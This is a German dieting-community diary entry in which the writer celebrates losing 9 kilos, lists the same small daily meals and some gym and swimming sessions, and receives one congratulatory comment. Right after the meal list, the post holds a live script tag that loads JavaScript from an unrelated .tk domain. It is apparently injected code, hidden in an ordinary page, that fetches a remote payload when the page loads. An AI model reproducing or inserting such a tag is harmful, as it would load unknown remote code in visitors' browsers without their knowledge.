Zum Inhalt springen

Sie sind hier

Woche 6 – 9 Kilo geschafft!

0  0
Am von im Ernährungstagebuch geschrieben

Juhu, ich habe es in dieser Woche geschafft, einen neuen Rekord für mich aufzustellen! Ich habe 9 Kilo abgenommen (soviel habe ich noch nie geschafft). Bin unheimlich stolz auf mich. Smile

Heute morgen wog ich nämlich 81.5 Kilo. Das bedeutet, in der Gesamtbilanz sind nun genau 9 Kilo futsch. Smile

Die Zusammenfassung der Woche:

Montag:

Ernährung: 2 Brote + 1 Teller Mittag

Sport: 1einhalb Stunden Fitnessstudio

Dienstag:

Ernährung: 2 Brote + 1 Teller Mittag

Mittwoch:

Ernährung: 2 Brote + 1 Teller Mittag

Sport: 1 Stunde Schwimmen

Donnerstag:

Ernährung: 2 Brote + 1 Teller Mittag

Freitag:

Ernährung: 2 Brote + 1 Teller Mittag

Samstag:

Ernährung: 2 Brote + 1 Teller Mittag

Sonntag:

Ernährung: 2 Brote + 1 Teller Mittag

Nascherei: Heute Mittag habe ich mit meiner Mutter so lecker gekocht, dass ich noch ein zweites Teller Mittag verschlungen habe. Zudem gab es zum Nachtisch ein Schälchen Cookie-Weintrauben-Dessert – yammi!

 

<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Abnehmen-Themen

- Nothing tastes as good as being fit feels! -

Vorheriger Ernährungstagebuch-Eintrag
Bild von Lauro1313 Woche 5 – Stillstand auf der Waage!
Nächster Ernährungstagebuch-Eintrag
Bild von laughy Neuer Job neue Ernährung

Kommentare

Bild des Benutzers laughy
0  0

Wow super, ich gratuliere Dir ganz herzlich. Das ist doch was Smileyes

*** Das Leben ist zu kurz um aufzugeben ***

Nach oben
Zur Hauptnavigation

Beiträge aus der Abnehmen-Community, die ebenfalls interessant sein könnten

Eintrag in ein Ernährungstagebuch von kortes: ...minus 1,8 Kg. Da war ich heute morgen echt platt. Gut ich habe es schon im Laufe der Woche gemerkt, dass da richtig was geht. Meine neuen Hosen wurden mir weit, die Blusen schlabbern und ich bin...
Ziel für den Abnehmplan von Juergen12053: Seit dem 31.07.2017 bin ich nun hier und habe meine Ernährung und mein Bewegungsverhalten versucht umzustellen. Mit bis jetzt gutem Erfolg! Mein Essen ist heute sehr viel ärmer an Kohlehydraten,...
Ziel für den Abnehmplan von MaddinE: Seit November gehe ich regelmäßig ins Fitnessstudio und habe Tagsüber keine Probleme damit mich ausgewogen zu Ernähren. Dafür Tappe ich hier und da Abends in die Kalorien-Falle wenn ich noch Hunger...
Eintrag in ein Ernährungstagebuch von laroro: Frühstück: Karotte, Hummus, Trauben, Apfel, Latte Macchiato ​Mittag: Wrap (Hühnchen, Kidneybohnen, Salat, Hummus, Saure Sahne, Zwiebel, Feta, Petersilie), Mandarine, Cornetto ​Abendessen: Karotten,...
Eintrag in ein Ernährungstagebuch von laroro: Frühstück: Baguette, Stück Brezel, Butter, Birne, Zartbitterschokolade, Vollmilchschokolade ​Mittag: Kartoffeln, Blumenkohl, Semmelbrösel, Sesam ​Abendessen: Brezel, Karotte, Hummus, Biss...
Diät-Erfolg von claudia0904: nachdem die waage mich wochenlang genervt hatte, habe ich heute , bis auf 100 gr. endlich 5 kilo runter. vor eintritt in dieses forum hatte ich schon ein wenig abgenommen. jetzt also definitiv von 88...

Gemeinsam abnehmen

Die Diät-Clique ist eine kostenlose Community rund ums Abnehmen:

Kostenlos abnehmen

Die Diät-Clique ist völlig kostenlos nutzbar. Du kannst

Neue Abnehmen-Tipps